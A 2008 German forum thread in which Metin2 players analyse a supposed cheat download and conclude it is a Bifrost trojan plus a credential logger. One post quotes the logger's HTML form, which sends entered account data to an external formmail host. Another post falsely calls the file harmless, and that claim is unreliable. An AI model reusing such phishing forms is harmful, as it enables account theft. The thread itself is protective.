Doch +9 HACK ? *skeptisch*

01/02/2008 19:58 k1dk0br4#1
Ich habe vorhin etwas gefunden, wo ich lange gezögert habe es zu zeigen aber jetzt doch tun werde. Es handelt sich um eine Blogseite wo anscheinend eine Beta-Version eines Metin-Cheaters getestet wird, die sich zu dem Server verbindet. Wie das ganze funktionieren soll ist mir auch unklar, ich habe mir das Tool runtergeladen und angezeigt wird wirklich das es sich zum Metin2-Server verbindet.

Klärt mich bitte auf um was genau es sich da handelt, ich habe nichts weiter gemacht als es mir angeschaut weil ich wie gesagt, sehr skeptisch war.

PS: Es war ein purer Zufall das ich die Seite gefunden habe. Habe einfach so mal eingegeben.

PS2: Ich möchte mich auf jeden Fall komplett davon distanzieren - für Schäden die entstehen KÖNNTEN. Geht vorsichtig damit um =/

*removed*
01/02/2008 20:06 ChriZzi#2
Ich schaus mir mal an und werde es evtl. mal im Virtuellen PC öffnen...

Sieht eigentlich sehr seriös aus,jedoch gibt es vieler solcher Seiten und 95% davon sind Logger usw...
01/02/2008 20:08 Held_am_Ball#3
ich kanns mir leider nich vorstellen das des en hack ist denke eher en logger
01/02/2008 20:10 k1dk0br4#4
ja ich habe da eigentlich kein bock mit in Berührung zu kommen, weil mein Hauptchara (mit dem ich nicht Cheate) ist LvL 54 und den will ich nicht wirklich aufgeben.

Habe eben schon alles gecheckt in meinem Prozessen und in der Registry.
scheint alles clean zu sein.
01/02/2008 20:31 Mystikbaster#5
kann es sein das der hack von seelord nen virus is ?????? pls mail me back
01/02/2008 20:40 Semaster#6
LOL, das isn bifrost trojaner. Ich habs mal mit Virus total geprüft und da stand schon bifrost. Dann hab ichs noch auf nem virtuellen pc gestartet und da is ne fehlermeldung gekommen wo irgendwas mit ner server.exe stand^^ Naja ich würds nich öffnen.
01/02/2008 20:42 k1dk0br4#7
ohje.. dann habe ich also möglicherweise nen Trojaner geöffnet ? was ist denn das Bifrost ?
01/02/2008 20:57 ChriZzi#8
Leute es wird als Virus angezeigt weil es die Werte von einem Programm [Metin2] verändert!

Es ist kein Virus der euch schädigt!
01/02/2008 21:02 MeepMoep#9
lolz hans, wenn das wirklich nen Bitfrost trojaner ist würd ichs ja nicht öffnen ;)
01/02/2008 21:17 ChriZzi#10
Nunma wieder Back²Topic

Es könnte einen Solchen Hack geben,wenn einer von euch sich mit Jinno Kartago auskennt wird er evtl. die Spieler Wasja,Split,sYnTroX & Tr1oX kennen die gebannt wurden...Allesamt Krieger mit erstaunlich gutem Equip.

Zu gutem Equip...
01/02/2008 21:40 Seedlord#11
Man kann es entpacken, z.B. mit Winrar. Wenn man es entpackt, erscheinen 2 Anwendungen. Einmal server.exe (schon wieder. den gabs öfters, auch bei dem yang hack) und metin2-cheater.v0.2beta.hta (ist eine HTML Anwendung). Die HTML Anwendung ist der eigentliche Hack, wo man seine Account Daten angeben soll. Ich persöhnlich würde das nicht machen. Wenn man es mit einem beliebigen Editor öffnet (z.B. Notepad), sieht man was es genau tut.
Hier ein kleiner Ausschnitt aus dem Code:
<form name="form1" action=http:// home. arcor.de/cgi-bin/formmail method=POST onSubmit="return testen();">
<input type=hidden name=email value="[Only registered and activated users can see links. Click Here To Register...]">
<input type=hidden name=url value="[Only registered and activated users can see links. Click Here To Register...]">

Ich kenne mich mit Html nicht aus, aber ich kann erkennen, dass durch Arcor, alles, was ihr eintragt an [Only registered and activated users can see links. Click Here To Register...] gesendet wird und anschließend die Seite metin2.de geöffnet wird.

Also nicht die Anwendung ausführen und falls ihr es doch tun wollt, entpacket es erst und öffnet metin2-cheater.v0.2beta.hta und nicht server.exe
01/02/2008 21:42 Mario2323#12
könnte jemand das ma auf VM ware starten und die Pakete abfangen mittlerweise kennen ja die meisten die server ip von metin.
so könnten wa raus finden ob´s n logger is
01/03/2008 00:49 Mattewagner#13
wie wäre es wenn einfach jemand sich nen neuen account macht und es ausprobiert.:D
01/03/2008 01:18 Rizeros#14
das kapier ich nicht also wen ich jetzt da was eingebe dan bekommt er meine acc oder wie ????
01/03/2008 01:21 ChriZzi#15
Er bekommt deine Acc Daten